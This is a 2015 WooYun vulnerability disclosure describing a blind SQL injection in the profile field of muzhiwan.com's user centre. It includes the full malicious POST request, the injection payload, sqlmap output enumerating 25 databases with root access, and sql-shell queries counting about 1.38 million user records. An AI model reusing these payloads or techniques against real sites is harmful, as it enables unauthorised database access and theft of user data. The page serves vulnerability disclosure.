当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147726

漏洞标题:拇指玩主站SQL注入影响百万用户数据

相关厂商:muzhiwan.com

漏洞作者: 路人甲

提交时间:2015-10-19 11:57

修复时间:2015-12-03 12:02

公开时间:2015-12-03 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

拇指玩主站注入影响百万用户数据

详细说明:

注入点位于主站用户中心->修改手机型号处

POST /index.php?action=profile&opt=Model HTTP/1.1
Host: u.muzhiwan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://u.muzhiwan.com/index.php?action=profile&opt=Model
Content-Length: 89
Cookie: __utma=203078925.498
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
brandname=5-if(1=1 AND length(database())=3,0,(select 1 union select 2))&productname=1193


mysql bool 盲注

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=album&aid=1 or 1=1-if(1=1 AND 4174=4174 ,0,(select 1 union select 2))
---
[03:12:54] [INFO] testing MySQL
[03:12:54] [INFO] confirming MySQL
[03:12:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[03:12:54] [INFO] fetching database names
[03:12:54] [INFO] fetching number of databases
[03:12:54] [INFO] resumed: 25
[03:12:54] [INFO] resumed: information_schema
[03:12:54] [INFO] resumed: anquanxia
[03:12:54] [INFO] resumed: applanet_user
[03:12:54] [INFO] resumed: bug
[03:12:54] [INFO] resumed: googleinstall
[03:12:54] [INFO] resumed: googlemarket
[03:12:54] [INFO] resumed: googlemarketgame
[03:12:54] [INFO] resumed: muzhiwan
[03:12:54] [INFO] resumed: muzhiwan130409
[03:12:54] [INFO] resumed: muzhiwan130417
[03:12:54] [INFO] resumed: muzhiwanbbs
[03:12:54] [INFO] resumed: muzhiwanbbstest
[03:12:54] [INFO] resumed: muzhiwantest
[03:12:54] [INFO] resumed: mysql
[03:12:54] [INFO] resumed: mzw
[03:12:54] [INFO] resumed: mzw_new_gz
[03:12:54] [INFO] resumed: mzw_oa
[03:12:54] [INFO] resumed: mzwtest
[03:12:54] [INFO] resumed: redmine
[03:12:54] [INFO] resumed: sdk
[03:12:54] [INFO] resumed: stat
[03:12:54] [INFO] resumed: stat_sdk
[03:12:54] [INFO] resumed: test
[03:12:54] [INFO] resumed: testlink
[03:12:54] [INFO] resumed: wikidatabase
available databases [25]:
[*] anquanxia
[*] applanet_user
[*] bug
[*] googleinstall
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase
root权限,貌似所有数据库都在了。
看看用户表
sql-shell> select count(*) from muzhiwanbbs.pre_ucenter_members
[03:05:24] [INFO] fetching SQL SELECT statement query output: 'select count(*) from muzhiwanbbs.pre_ucenter_members'
[03:05:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:05:24] [INFO] retrieved: 1386124
select count(*) from muzhiwanbbs.pre_ucenter_members: '1386124'
sql-shell> select count(*) from mzw.mzw_users
影响138w论坛用户数据

修复方案:

你懂

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-19 12:00

厂商回复:

谢谢,我们会尽快修复

最新状态:

暂无


漏洞评价:

评论